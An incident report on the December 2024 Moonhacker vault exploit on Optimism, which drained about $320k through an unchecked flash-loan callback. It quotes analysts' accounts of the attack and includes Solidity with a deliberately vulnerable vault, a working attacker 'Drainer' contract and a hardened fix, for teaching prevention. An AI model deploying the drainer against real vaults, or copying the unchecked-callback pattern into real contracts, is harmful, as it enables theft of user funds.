Dec 2024 - Moonhacker Moonwell Vault Unprotected ExecuteOperation Call - $320k (Global)

Moonwell is a decentralized lending platform that enables users to lend or borrow digital assets without monthly payments or additional fees, allowing for flexible repayment schedules. It prioritizes security by conducting thorough audits through Halborn Security and offering a bug bounty program with rewards up to $250,000. The platform operates across multiple networks, including Base, Moonbeam, and Optimism, with a variety of available markets such as USDC, Ethereum, and Staked Ethereum, offering competitive annual percentage yields (APY). Moonwell also emphasizes community governance, empowering members to make decisions and adapt to changing market conditions. The platform currently has a total market size of nearly $791 million, with a significant portion supplied by its users.
The attack targeted the MoonHacker vault contracts, third-party contracts that interact with the Moonwell lending protocol on the Optimism network, and exploited missing input validation in the executeOperation function, the vault's flash-loan callback. Because the callback neither verified who was calling it nor validated the mToken address it received, the attacker could pass their own contract as the mToken, receive token approvals from the vault, and drain its holdings. The attacker deployed two contracts, triggered the vulnerability, and withdrew the stolen funds. To mitigate such risks, the analyses cited below recommend proper input validation, access control, and function modifiers on privileged callbacks. The incident highlights the importance of comprehensive audits and validation checks in smart contract security to protect user funds in the DeFi ecosystem.
"First, the attacker took out a flash loan of USDC on Aave, because they needed more USDC to call repayBorrow and redeem (withdraw) many times to drain the vault."
"Next, they called the vulnerable executeOperation function on the Moonhacker vault, but instead of specifying the mUSDC contract, they specified their own wallet as the approval address.
This allowed them to steal all the mUSDC collateral tokens held by the vault."
"Then they simply called repayBorrow and redeem (withdraw) multiple times to withdraw all of the underlying USDC that was previously held by the Moonhacker vault.
Finally, they repaid the flash loan to Aave and took all the USDC profit they had stolen from Moonhacker."
"Compound fork lending project – Moonwell was hacked because of improper input check.
There’re several Moonhacker contracts that can be used for smart supply and borrow. In “executeOperation” function, input data is not checked, hacker was able to input his own contract as mToken contract as there’s no check.
If he provide his contract as mToken, Moonhacker contract approves his tokens to that contract.
Then, he could move all tokens to his contract. Total loss is about $320k."
"As a precautionary measure, I withdrew my funds in the @MoonwellDeFi Flagship USDC vault curated by Morpho until an official report is out. If you have funds in the pool on Optimium, withdraw them as soon as possible."
Luke Youngblood offered help to whoever is behind the affected vault contract: "If the team or individual behind Moonhacker would like to reach out and get help from Moonwell contributors or teams like Seal 911 who can potentially try to help them recover the USDC stolen from their vault, please DM me on Telegram". It is unclear whether any effort was undertaken to track or recover the funds.
Further Analysis
Moonwell is a decentralized lending platform that allows users to lend or borrow digital assets with flexible repayment schedules and no additional fees. It prioritizes security through audits by Halborn Security and a bug bounty program with rewards up to $250,000. The platform operates across multiple networks, including Base, Moonbeam, and Optimism, offering markets for USDC, Ethereum, and Staked Ethereum with competitive APY. Moonwell emphasizes community governance and has a total market size of nearly $791 million. The exploit targeted the MoonHacker vault, a third-party contract interacting with Moonwell on Optimism, where a vulnerability in the executeOperation function allowed an attacker to redirect token approvals and steal approximately $320,000 in USDC. Moonwell's own lending pools were not affected, and the MoonHacker deployers have no known connection to Moonwell. The creator of the MoonHacker vault does not appear to have responded to the situation.
How Could This Have Been Prevented?
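As an added illustration, not the Moonhacker or Moonwell source (which this page does not reproduce), the following Solidity sketch shows the bug class the analyses above describe: a flash-loan callback that anyone can call and that approves whatever address the caller names, next to a hardened version of the same vault. The interface names, the Drainer contract, the layout of the params bytes, and the Aave V3-style executeOperation signature are assumptions made for the example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Hypothetical reconstruction of the bug class; not the Moonhacker or Moonwell code.
interface IERC20 {
    function approve(address spender, uint256 amount) external returns (bool);
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
    function balanceOf(address account) external view returns (uint256);
}

// Compound-style market interface (the subset the vault needs).
interface IMToken {
    function repayBorrow(uint256 repayAmount) external returns (uint256);
    function redeem(uint256 redeemTokens) external returns (uint256);
}

/// Vulnerable: executeOperation (the Aave V3 flash-loan callback) is callable by
/// anyone, and the address it approves is decoded straight from caller-supplied params.
contract VulnerableVault {
    address public immutable usdc;
    constructor(address _usdc) { usdc = _usdc; }

    function executeOperation(
        address, uint256, uint256, address, bytes calldata params
    ) external returns (bool) {
        (address mToken, uint256 repayAmount, uint256 redeemTokens) =
            abi.decode(params, (address, uint256, uint256));
        // Unrestricted approve: "mToken" may be any address, including the attacker's.
        IERC20(usdc).approve(mToken, type(uint256).max);
        IMToken(mToken).repayBorrow(repayAmount);
        IMToken(mToken).redeem(redeemTokens);
        return true;
    }
}

/// Attacker contract: calls the callback directly with itself as the mToken, then
/// pulls the vault's balance through the approval it was just granted. No flash
/// loan is needed for this step; the loan only matters once a real market is involved.
contract Drainer is IMToken {
    function repayBorrow(uint256) external pure returns (uint256) { return 0; }
    function redeem(uint256) external pure returns (uint256) { return 0; }

    function drain(VulnerableVault vault) external {
        vault.executeOperation(
            address(0), 0, 0, address(0),
            abi.encode(address(this), uint256(0), uint256(0))
        );
        IERC20 usdc = IERC20(vault.usdc());
        usdc.transferFrom(address(vault), msg.sender, usdc.balanceOf(address(vault)));
    }
}

/// Hardened: only the lending pool may invoke the callback, only for flash loans
/// this vault itself initiated, and only against a market fixed at deployment.
contract HardenedVault {
    address public immutable usdc;
    address public immutable pool;    // the flash-loan pool this vault borrows from
    address public immutable mToken;  // the single Moonwell market this vault uses

    error NotPool();
    error NotInitiator();

    constructor(address _usdc, address _pool, address _mToken) {
        usdc = _usdc;
        pool = _pool;
        mToken = _mToken;
        // Approve once, to the fixed market only; nothing in the callback can redirect it.
        IERC20(_usdc).approve(_mToken, type(uint256).max);
    }

    function executeOperation(
        address asset, uint256 amount, uint256 premium, address initiator, bytes calldata params
    ) external returns (bool) {
        if (msg.sender != pool) revert NotPool();
        if (initiator != address(this)) revert NotInitiator();
        (uint256 repayAmount, uint256 redeemTokens) = abi.decode(params, (uint256, uint256));
        IMToken(mToken).repayBorrow(repayAmount);
        IMToken(mToken).redeem(redeemTokens);
        // The only approval the callback grants: let the pool pull back principal plus fee.
        IERC20(asset).approve(pool, amount + premium);
        return true;
    }
}
```

The hardened vault adds three checks the vulnerable one lacks: msg.sender must be the lending pool, initiator must be the vault itself (so only flash loans the vault started ever reach the callback), and the mToken is fixed at deployment instead of being decoded from params, so the callback has nothing left to approve to an arbitrary address. A vault that must support several markets can replace the immutable with an allowlist checked against the protocol's comptroller; the invariant to preserve is that an approval target never comes from untrusted calldata.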
Sources/Further Reading
OP Mainnet Transaction Hash (Txhash) Details | OP Mainnet Etherscan (Dec 31)
OP Mainnet Transaction Hash (Txhash) Details | OP Mainnet Etherscan (Dec 31)
0xNickLFranklin - "There're several Moonhacker contracts that can be used for smart supply and borrow. In "executeOperation" function, input data is not checked, hacker was able to input his own contract" - Twitter (Dec 31)
Moonwell hacked. – Defi hack analysis (Dec 31)
@CyversAlerts Twitter (Dec 31)
@LukeYoungblood Twitter (Dec 31)
MoonHacker | Address 0xd9b45e2c389b6ad55dd3631abc1de6f2d2229847 | OP Mainnet Etherscan (Dec 31)
OP Mainnet Transaction Hash (Txhash) Details | OP Mainnet Etherscan (Dec 31)
https://www.binance.com/en/square/post/12-24-2024-moonhacker-contract-suffers-flash-loan-attack-incurring-320-000-loss-17975611563473 (Dec 31)
Moonhacker contract suffered a flash loan attack, resulting in a loss of approximately $320,000 - ChainCatcher (Dec 31)
Moonhacker contract was attacked by flash loan, losing about $320,000 - PANews (Dec 31)
"The stolen funds on MoonHacker only trace to several 'SmartSupply()' call days ago while the Moonwell lending pools are not affected. The "MoonHacker" deployers have no known connection to Moonwell." (Dec 31)
DeFiHackLabs/src/test/2024-12/Moonhacker_exp.sol at main · SunWeb3Sec/DeFiHackLabs · GitHub (Dec 31)
Debaub - "The attacker abused an Unchecked FlashLoan Callback & an Unrestricted Approve Proxy." - Twitter (Dec 31)
Original CertiK Post (Dec 31)
MoonHacker Vault Hack Analysis - Verichains (Dec 31)
MoonHacker Vault Hack Analysis - Shashank (Dec 31)
SJ_cryptosight - "As a precautionary measure, I withdrew my funds in the @MoonwellDeFi Flagship USDC vault curated by Morpho until an official report is out. If you have funds in the pool on Optimism, withdraw them as soon as possible." - Twitter (Dec 31)
Lukeyoungblood - "If the team or individual behind Moonhacker would like to reach out and get help from Moonwell contributors or teams like Seal 911 who can potentially try to help them recover the USDC stolen from their vault, please DM me on Tel...itter (Dec 31)
t.me/QuadrigaInitiative | /r/QuadrigaInitiative | @QuadrigaInit | info@quadrigainitiative.com